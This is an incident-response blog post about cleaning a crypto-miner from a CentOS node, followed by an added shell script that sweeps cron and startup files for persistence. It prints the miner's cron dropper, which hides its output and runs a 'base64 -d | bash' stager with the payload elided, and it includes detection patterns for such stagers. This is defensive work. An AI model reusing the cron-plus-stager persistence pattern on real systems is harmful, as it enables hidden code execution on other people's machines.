Notes from cleaning up a crypto-mining infection


Background

I just took over an environment, and during the handover my colleague mentioned that these machines had been hit by a crypto-mining virus and still hadn't been reinstalled. WTF...

It's a production environment and not easy to take down, so manual cleanup was the only option.

The operating system:

[root@k8s-node7 ~]# cat /etc/redhat-release 
CentOS Linux release 7.5.1804 (Core) 

Process

After SSHing in, ps -ef showed the following:

[Screenshot of the ps -ef output; not reproduced in the text]

Killing the processes by hand, new ones appeared almost immediately, so I guessed there was a watchdog process respawning them. Instead, I froze them with the STOP signal.

[root@k8s-node7 ~]# kill -STOP 165224
[root@k8s-node7 ~]# kill -STOP 223135

Check the scheduled tasks and clean them up

[root@k8s-node7 ~]# crontab -l
8 * * * * /root/.systemd-service.sh > /dev/null 2>&1 &
[root@k8s-node7 ~]# cat /root/.systemd-service.sh 
#!/bin/bash
exec &>/dev/null
echo tndtCwuLieAr5wvPgknqmFZpHZWrMf+G9UhUYqmI2z2sX3NaL+fIvmN+PKEvAKMk
echo <base64 payload elided>|base64 -d|bash
[root@k8s-node7 ~]# rm -f !$
rm -f /root/.systemd-service.sh

Then continue cleaning up the other cron locations, such as /var/spool/cron/, /etc/crontab and /etc/cron*:

[root@k8s-node7 crontabs]# cd /etc/cron.d
[root@k8s-node7 cron.d]# ls
0systemd-service
[root@k8s-node7 cron.d]# cat 0systemd-service 
9 * * * * root /opt/systemd-service.sh > /dev/null 2>&1 &
[root@k8s-node7 cron.d]# pwd
/etc/cron.d
[root@k8s-node7 cron.d]# rm -f 0systemd-service 

[root@k8s-node7 ~]# ll -d /etc/cron.*
drwxr-xr-x. 2 root root 4096 3月  10 11:01 /etc/cron.d
drwxr-xr-x. 2 root root 4096 12月 18 15:31 /etc/cron.daily
-rw-------. 1 root root    0 4月  11 2018 /etc/cron.deny
drwxr-xr-x. 2 root root 4096 9月  25 2019 /etc/cron.hourly
drwxr-xr-x. 2 root root 4096 6月  10 2014 /etc/cron.monthly
drwxr-xr-x. 2 root root 4096 6月  10 2014 /etc/cron.weekly
[root@k8s-node7 ~]# ll -d /etc/cron.*/*
-rwx------. 1 root root 219 4月  11 2018 /etc/cron.daily/logrotate
-rwxr-xr-x. 1 root root 392 4月  11 2018 /etc/cron.hourly/0anacron
-rwxr-xr-x. 1 root root 191 4月  11 2018 /etc/cron.hourly/mcelog.cron

At the same time, check the boot startup locations and so on and clean them one by one. Then kill the processes that were STOPped earlier and watch for a while to see whether they come back on their own.
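As an added example (this is not code from the original post), the sweep above can be turned into a repeatable triage script: it walks the cron locations the post checked (per-user crontabs, /etc/crontab, /etc/cron.d, /etc/cron.{hourly,daily,weekly,monthly}), plus rc.local and /etc/systemd/system units, flags entries that look like the ones found here (hidden .sh scripts, scripts under /root or /opt, inline base64 decoding, trailing "&"), and follows each cron entry to the script it runs to look for a decode-and-run stager such as "echo <b64> | base64 -d | bash". The patterns, function names and the fixture tree are assumptions; the fixture reproduces the post's two cron entries and stager script with the base64 payload replaced by a placeholder string.

```shell
#!/bin/sh
# Added triage example, not code from the original post. Sweeps cron persistence
# locations and startup files, and follows cron entries into the scripts they run
# to spot decode-and-run stagers. All patterns below are assumed heuristics.

# Indicators in a cron entry or ExecStart line (assumed heuristics):
#   hidden script (/.name.sh); scripts under /root /opt /tmp /var/tmp /dev/shm /home;
#   inline base64 decode; curl/wget in the entry; trailing "&" backgrounding.
LINE_RE='/\.[^/[:space:]]+\.sh|(^|[[:space:]=])/(root|opt|tmp|var/tmp|dev/shm|home)/|base64[[:space:]]+(-d|--decode)|(curl|wget)[[:space:]]|&[[:space:]]*$'
# Indicators inside a referenced script (assumed heuristics): pipe-to-shell after a
# base64 decode or a download, and "exec &>/dev/null" output suppression.
SCRIPT_RE='base64[[:space:]]+(-d|--decode)[[:space:]]*\|[[:space:]]*(ba)?sh|exec[[:space:]]+&>[[:space:]]*/dev/null|(curl|wget)[^|]*\|[[:space:]]*(ba)?sh'

# cron_entries FILE: non-comment, non-empty lines of a cron file.
cron_entries() {
    grep -vE '^[[:space:]]*(#|$)' "$1" 2>/dev/null || true
}

# first_path LINE: first absolute path token in the line (the script the entry runs).
first_path() {
    printf '%s\n' "$1" | grep -oE '(^|[[:space:]])/[^[:space:]>|&;]+' | head -n 1 | sed 's/^[[:space:]]*//'
}

# audit_cron_file ROOT FILE: report suspicious entries in FILE and findings inside
# the scripts they reference (script paths are resolved under ROOT; paths are
# assumed to contain no '|' or '&', which sed would misread in the replacement).
audit_cron_file() {
    root="$1"; f="$2"
    [ -f "$f" ] || return 0
    cron_entries "$f" | while IFS= read -r line; do
        if printf '%s\n' "$line" | grep -qE "$LINE_RE"; then
            printf 'CRON %s: %s\n' "$f" "$line"
        fi
        s=$(first_path "$line")
        if [ -n "$s" ] && [ -f "$root$s" ]; then
            grep -nE "$SCRIPT_RE" "$root$s" 2>/dev/null | sed "s|^|SCRIPT $root$s:|" || true
        fi
    done
}

# audit_cron_tree [ROOT]: walk the standard cron locations under ROOT (default "/").
audit_cron_tree() {
    root="${1:-/}"; root="${root%/}"
    for p in "$root"/etc/crontab "$root"/etc/cron.d/* "$root"/etc/cron.hourly/* \
             "$root"/etc/cron.daily/* "$root"/etc/cron.weekly/* "$root"/etc/cron.monthly/* \
             "$root"/var/spool/cron/* "$root"/var/spool/cron/crontabs/*; do
        audit_cron_file "$root" "$p"
    done
}

# audit_startup_tree [ROOT]: rc.local and /etc/systemd/system units matching LINE_RE.
audit_startup_tree() {
    root="${1:-/}"; root="${root%/}"
    for p in "$root"/etc/rc.local "$root"/etc/rc.d/rc.local "$root"/etc/systemd/system/*.service; do
        [ -f "$p" ] || continue
        grep -nE "$LINE_RE" "$p" 2>/dev/null | grep -vE '^[0-9]+:[[:space:]]*#' | sed "s|^|STARTUP $p:|" || true
    done
}

# audit_all [ROOT]: combined report; count_findings [ROOT]: number of report lines.
audit_all() { audit_cron_tree "$1"; audit_startup_tree "$1"; }
count_findings() { audit_all "$1" | wc -l | sed 's/[[:space:]]//g'; }

# build_fixture: constructed sample tree reproducing the post's findings, with the
# base64 payload replaced by a placeholder string. Prints the temp root.
build_fixture() {
    d=$(mktemp -d)
    mkdir -p "$d/etc/cron.d" "$d/etc/cron.daily" "$d/etc/systemd/system" \
             "$d/var/spool/cron" "$d/root" "$d/opt"
    printf '8 * * * * /root/.systemd-service.sh > /dev/null 2>&1 &\n' > "$d/var/spool/cron/root"
    printf '9 * * * * root /opt/systemd-service.sh > /dev/null 2>&1 &\n' > "$d/etc/cron.d/0systemd-service"
    printf '#!/bin/bash\nexec &>/dev/null\necho PAYLOAD_PLACEHOLDER|base64 -d|bash\n' > "$d/root/.systemd-service.sh"
    cp "$d/root/.systemd-service.sh" "$d/opt/systemd-service.sh"
    printf '[Service]\nExecStart=/opt/systemd-service.sh\n' > "$d/etc/systemd/system/systemd-service.service"
    # benign entry that must not be reported
    printf '#!/bin/sh\n/usr/sbin/logrotate /etc/logrotate.conf\n' > "$d/etc/cron.daily/logrotate"
    printf '%s\n' "$d"
}

# demo: run the sweep against the fixture; on a real host run "audit_all /" as root.
demo() {
    root=$(build_fixture)
    audit_all "$root"
    rm -rf "$root"
}

demo
```

Run it as root (per-user crontabs under /var/spool/cron are not readable otherwise) with `audit_all /`. Every line it prints is a review candidate, not a verdict: scripts under /opt are often legitimate, so the value is in the SCRIPT lines, which show whether the referenced file decodes and pipes something into a shell. Once the list is clean, the STOPped processes can be killed and the host watched for respawns, as the post describes.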
